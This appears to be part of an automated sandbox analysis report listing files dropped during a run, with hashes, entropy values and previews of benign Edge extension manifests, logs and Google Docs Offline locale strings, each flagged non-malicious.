                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):138356
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.809609231921042
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:AQ++ZdS5+fnwcxO+XwquyeNnmraugZ/1DOoncWD/5q:AQ++/PZmlyeNnh/1SmRq
                                                                                                                                                                                                                                                                                                                  MD5:3F6F93C3DCCD4A91C4EB25C7F6FEB1C1
                                                                                                                                                                                                                                                                                                                  SHA1:9B73F46ADFA1F4464929B408407E73D4535C6827
                                                                                                                                                                                                                                                                                                                  SHA-256:19F05352CB4C6E231C1C000B6C8B7E9EDCC1E8082CAF46FFF16B239D32AA7C9E
                                                                                                                                                                                                                                                                                                                  SHA-512:D488FA67E3A29D0147E9EAF2EABC74D9A255F8470CF79A4AEA60E3B3B5E48A3FCBC4FC3E9CE58DFF8D7D0CAA8AE749295F221E1FE1BA5D20DEB2D97544A12BA4
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):11185
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                                  MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                                  SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                                  SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                                  SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1420
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.3886031940472
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:YJxF5sQ5szAW01Rp5yK10YO5qv70VhQu5Fa0YiN55ip70YFRcHv5M:YJxF5sQ5sEW01X5y60YO5qD0VH5Fa0TI
                                                                                                                                                                                                                                                                                                                  MD5:D941AF31220784A09C1B37DC55429B13
                                                                                                                                                                                                                                                                                                                  SHA1:C1593666C63F072E93559CBC78C16AF81402951F
                                                                                                                                                                                                                                                                                                                  SHA-256:BBFEFC00DD8E5E55201A67E69133651081E6321E17AF69103A99FB56F4C7EDA3
                                                                                                                                                                                                                                                                                                                  SHA-512:EDDB43C94810060A8025B36CCA843746302C4C116243C2C204BB06B7AE128EA1C574E3DA12A8EC4A938783EA088294C998398D42B22F5770722565BEBE91DD7A
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"logTime": "1005/081724", "correlationVector":"2/PmMr7SOFFRIqTwW+HesJ","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/081729", "correlationVector":"mBsci4p0IuAlecFQAh3IDU","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/081729", "correlationVector":"EFCCE5F7ECC74238A0D17C500D8EB81C","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/083130", "correlationVector":"jkXXrPbML/1ucIa5c7okZ6","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/083130", "correlationVector":"CECEB17551BE48CCBF3DD12E07118D84","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/083241", "correlationVector":"WUtA7xoJfeUJPFSRRtPAng","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/083242", "correlationVector":"B7F67C44DD3147F7BE748158D3F8E7B5","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/083444", "correlationVector":"6kKZpL8SvSsrBcj/Fl+tva","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/083445", "correlationVector":"94D95442
                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1048575
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:1f/:F
                                                                                                                                                                                                                                                                                                                  MD5:52EEA21AFDC1FA07894225ED9536D245
                                                                                                                                                                                                                                                                                                                  SHA1:9F0EDB171DBF05A67ADEDA2C3FF1768D5066F9BE
                                                                                                                                                                                                                                                                                                                  SHA-256:3A36D5B3161D3A27AE6D1390D5D959786DADF6860882022745B1F73190D04E9C
                                                                                                                                                                                                                                                                                                                  SHA-512:EC45901B1BCB35F2B166C519EE6F7C072D46C13D94327415AC316E16DDB552C1CBCA807827132F0167D121ED762CB6364AC19BCCC2699A6D033A3B57929E7A69
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):31335
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.694019108205432
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:768:514ugFV0910SWyR5kNVdS3sNp/xm3MbiMuYEDlyFUyv6E/ty8:5WcDWyRKNVd2M/IxMuYEDlymsTQ8
                                                                                                                                                                                                                                                                                                                  MD5:6B72597205C77D3E40E1A35BEE403801
                                                                                                                                                                                                                                                                                                                  SHA1:6BECEE055C6E057AF9475B6D651B4EE561D02F20
                                                                                                                                                                                                                                                                                                                  SHA-256:C899297FBDFC88C1634B1145A087FDB5BE17172FD786C078B299557B22F06DEB
                                                                                                                                                                                                                                                                                                                  SHA-512:7CB1A98E0C7FBB349D9CB681233A9F4ED22A1C3FAADCDF1BC270B04BD97D3FC41AB6F762B2F5F231281D63D96AC3D243640BA81D5E8CCD9F54486B4F538CA8B4
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1753
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                                                                  MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                                                                  SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                                                                  SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                                                                  SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "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",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):9815
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                                                                  MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                                                                  SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                                                                  SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                                                                                  SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):10388
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                                                                  MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                                                                  SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                                                                  SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                                                                  SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):962
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                                                                  MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                                                                  SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                                                                  SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                                                                  SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):11185
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                                  MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                                  SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                                  SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                                  SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):138356
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.809609231921042
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:AQ++ZdS5+fnwcxO+XwquyeNnmraugZ/1DOoncWD/5q:AQ++/PZmlyeNnh/1SmRq
                                                                                                                                                                                                                                                                                                                  MD5:3F6F93C3DCCD4A91C4EB25C7F6FEB1C1
                                                                                                                                                                                                                                                                                                                  SHA1:9B73F46ADFA1F4464929B408407E73D4535C6827
                                                                                                                                                                                                                                                                                                                  SHA-256:19F05352CB4C6E231C1C000B6C8B7E9EDCC1E8082CAF46FFF16B239D32AA7C9E
                                                                                                                                                                                                                                                                                                                  SHA-512:D488FA67E3A29D0147E9EAF2EABC74D9A255F8470CF79A4AEA60E3B3B5E48A3FCBC4FC3E9CE58DFF8D7D0CAA8AE749295F221E1FE1BA5D20DEB2D97544A12BA4
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):4982
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                                                                  MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                                                                  SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                                                                  SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                                                                  SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):908
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                                                                  MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                                                                  SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                                                                  SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                                                                  SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1285
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                                                                  MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                                                                  SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                                                                  SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                                                                  SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1244
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):977
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):3107
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1389
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1763
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):930
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  Malicious:false
